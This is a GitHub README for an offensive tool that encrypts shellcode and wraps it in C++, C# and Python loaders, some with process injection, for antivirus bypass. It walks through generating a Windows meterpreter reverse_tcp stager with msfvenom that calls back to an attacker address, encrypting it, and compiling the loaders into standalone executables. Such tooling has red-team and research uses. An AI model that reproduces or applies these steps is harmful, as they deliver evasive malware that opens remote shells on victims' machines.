Skip to content

Shellcode wrapper with encryption for multiple target languages

Notifications You must be signed in to change notification settings

andrewchiles/ShellcodeWrapper

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Mutlibyte XOR or AES encrypted shellcode

  • Updated by @andrewchiles to remove hardcoded output paths and add additional code templates

Author: Arno0x0x - @Arno0x0x

These little proof of concept are inspired by this blogpost: Bypass antivirus with 10 lines of code

The technique uses two kind of code file:

  1. The shellcode encoder/encrypter: shellcode_encoder.py
  2. Various shellcode wrapper, in C++, C# and Python:
    • encryptedShellcodeWrapper.cpp - for now supports only XOR encryption
    • encryptedShellcodeWrapper.cs - supports both XOR and AES encryption
    • encryptedShellcodeWrapper_inject.cs - same as above with process injection
    • encryptedShellcodeWrapper.py - supports both XOR and AES encryption

Installation

Installation is straight forward:

  • Git clone this repository: git clone https://github.com/Arno0x/ShellcodeWrapper ShellcodeWrapper
  • cd into the ShellcodeWrapper folder: cd ShellcodeWrapper
  • Install requirements using pip install -r requirements.txt
  • Give the execution rights to the main script: chmod +x shellcode_encoder.py

Usage

First, you need to obtain a usable shellcode from metasploit (run it from a Kali distribution), for example:

root@kali:~# msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.52.130 LPORT=4444 -f raw > shellcode.raw

In this example, the output is a raw (unencoded & unencrypted) reverse_tcp meterpreter stager for x86 platform. You should adapt it to your needs (payload and parameters).

Second, run the shellcode_encoder.py script along with the desired arguments:

  • raw shellcode filename
  • encryption key
  • encryption type: xor or aes
  • desired output: base64, cpp, csharp, python

For instance, to xor encrypt the shellcode with the key 'thisismykey' and get an output code file in C#, C++ and Python:

root@kali:~# ./shellcode_encoder.py -cpp -cs -py shellcode.raw thisismykey xor

This will generate C#, C++ and Python code file in the result folder. Those files are ready to use/compile.

Eventually:

  1. For the C++ wrapper, compile the C++ code file into a Windows executable: you can create a new VisualStudio project for Win32 console application and use the C++ code provided as the main file. Any other method of compilation will require slight adjustment of the C++ code (headers mostly).
  2. For the C# wrapper, compile the C# code file into a Windows executable: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:multibyteEncodeShellcode.exe multibyteEncodeShellcode.cs
  3. For the Python wrapper, just run it as a python script, or use PyInstaller to make it a Windows standalone executable

About

Shellcode wrapper with encryption for multiple target languages

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • C# 52.1%
  • Python 44.5%
  • C++ 3.4%